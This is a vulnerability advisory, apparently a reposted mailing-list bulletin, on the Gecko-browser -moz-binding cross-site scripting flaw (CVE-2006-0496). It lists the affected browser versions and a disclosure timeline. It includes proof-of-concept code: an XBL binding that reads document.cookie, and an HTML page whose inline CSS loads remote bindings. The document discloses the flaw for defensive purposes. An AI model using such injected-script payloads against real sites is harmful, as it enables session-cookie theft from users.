‘Gecko Based Browsers -moz-binding XSS’
Summary
”XBL is a markup language for describing bindings that can be attached to elements in other documents.’ ‘The value of the -moz-binding property is a set of URLs that identify specific bindings. An individual URL in the set consists of the binding document’s URL and the binding’s document-unique identifier.’
Credit:
‘The information has been provided by Juha-Matti Laurio.
The bug report can be found at: https://bugzilla.mozilla.org/show_bug.cgi?id=324253
A blog about the vulnerability can be found at: http://community.livejournal.com/lj_dev/708069.html‘
Details
‘Vulnerable Systems:
* Mozilla Firefox 1.5 and prior
* Mozilla Firefox 1.0 and above
* Netscape version 8.1 and prior
* Mozilla Suite version 1.7.12 and prior
* Mozilla Seamonkey 1.0
Gecko based browsers uses the CSS option -moz-binding in order to bind XBL code from additional locations including remote hosts.
Attackers can use the -moz-binding option in order to inject Javascript code and to perform a cross site scripting attack from remote location.
Proof of Concept:
Cookie reading:
< !–
this must be served with Content-type: text/xml or similar
— >
< bindings>
< binding id=’exploit’>
< implementation>
< constructor>
//
function exploitMe( element ) {
element.innerHTML = ‘Attempting to read cookie data…’;
var data;
try {
data = document.cookie || ‘No cookie data.’;
} catch( e ) {
data = ‘Unable to read cookie.’
}
element.innerHTML = data;
element.style.color = ‘green’;
}
exploitMe( this );
//
< / constructor>
< / implementation>
< / binding>
< / bindings>
Remote loading of script file:
< ! DOCTYPE html PUBLIC ‘-//W3C//DTD XHTML 1.0 Transitional//EN’ ‘http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd’>
< html >
< head>
< meta http-equiv=’Content-Type’ content=’text/html; charset=utf-8′ />
< title>Cookie Exploit< /title>
< / head>
< body>
< h1>Cookie Exploit using CSS< / h1>
< p style=’color: red; -moz-binding: url(https://bugzilla.mozilla.org/attachment.cgi?id=209238#exploit); behavior: url(https://bugzilla.mozilla.org/attachment.cgi?id=209240);’>
This is a paragraph with inline exploit CSS.
The CSS executes JavaScript that can read cookies.
< / p>
< / body>
< / html>
CVE Information:
CVE-2006-0496
Disclosure Timeline:
1-Feb-2006 – Vulnerability researched and confirmed
2-Feb-2006 – Detailed research
2-Feb-2006 – Vendor contacted
2-Feb-2006 – Security companies and several CERT units contacted’